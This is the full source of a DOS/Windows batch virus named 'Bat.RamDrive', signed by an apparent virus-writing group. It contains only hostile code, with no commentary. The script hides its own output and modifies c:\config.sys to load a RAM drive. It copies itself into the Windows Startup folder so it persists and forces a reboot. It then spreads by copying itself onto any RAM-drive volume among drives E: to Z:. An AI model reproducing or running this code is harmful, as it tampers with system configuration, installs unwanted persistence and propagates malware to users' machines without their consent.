@ctty nul
echo.>con
echo.>con
echo.>con
echo                    +-----------------------------------------+>con
echo                    I        Bat.RamDrive - DvL [rRLF]        I>con
echo                    +-----------------------------------------+>con
echo.>con
echo.>con
if not exist c:\config.sys goto end
find /i "ramdrive" c:\config.sys
if errorlevel 1 goto infect
%comspec% /f /c dir e:>c:\e.1
%comspec% /f /c dir f:>c:\f.1
%comspec% /f /c dir g:>c:\g.1
%comspec% /f /c dir h:>c:\h.1
%comspec% /f /c dir i:>c:\i.1
%comspec% /f /c dir j:>c:\j.1
%comspec% /f /c dir k:>c:\k.1
%comspec% /f /c dir l:>c:\l.1
%comspec% /f /c dir m:>c:\m.1
%comspec% /f /c dir n:>c:\n.1
%comspec% /f /c dir o:>c:\o.1
%comspec% /f /c dir p:>c:\p.1
%comspec% /f /c dir q:>c:\q.1
%comspec% /f /c dir r:>c:\r.1
%comspec% /f /c dir s:>c:\s.1
%comspec% /f /c dir t:>c:\t.1
%comspec% /f /c dir u:>c:\u.1
%comspec% /f /c dir v:>c:\v.1
%comspec% /f /c dir w:>c:\w.1
%comspec% /f /c dir x:>c:\x.1
%comspec% /f /c dir y:>c:\y.1
%comspec% /f /c dir z:>c:\z.1
find /i "ms-ramdrive" c:\e.1
if not errorlevel 1 copy %0 e:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\f.1
if not errorlevel 1 copy %0 f:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\g.1
if not errorlevel 1 copy %0 g:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\h.1
if not errorlevel 1 copy %0 h:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\i.1
if not errorlevel 1 copy %0 i:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\j.1
if not errorlevel 1 copy %0 j:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\k.1
if not errorlevel 1 copy %0 k:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\l.1
if not errorlevel 1 copy %0 l:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\m.1
if not errorlevel 1 copy %0 m:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\n.1
if not errorlevel 1 copy %0 n:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\o.1
if not errorlevel 1 copy %0 o:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\p.1
if not errorlevel 1 copy %0 p:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\q.1
if not errorlevel 1 copy %0 q:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\r.1
if not errorlevel 1 copy %0 r:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\s.1
if not errorlevel 1 copy %0 s:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\t.1
if not errorlevel 1 copy %0 t:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\u.1
if not errorlevel 1 copy %0 u:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\v.1
if not errorlevel 1 copy %0 v:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\w.1
if not errorlevel 1 copy %0 w:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\x.1
if not errorlevel 1 copy %0 x:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\y.1
if not errorlevel 1 copy %0 y:\ramdrive.bat>nul
find /i "ms-ramdrive" c:\z.1
if not errorlevel 1 copy %0 z:\ramdrive.bat>nul
deltree/y c:\*.1>nul
goto end
:infect
echo.device=%windir%\himem.sys>>c:\config.sys
echo.device=%windir%\ramdrive.sys 256 /e>>c:\config.sys
copy %0 %windir%\startm~1\programs\startup\ramdrive.bat>nul
rundll32 shell32.dll,SHExitWindowsEx 2
:end
cls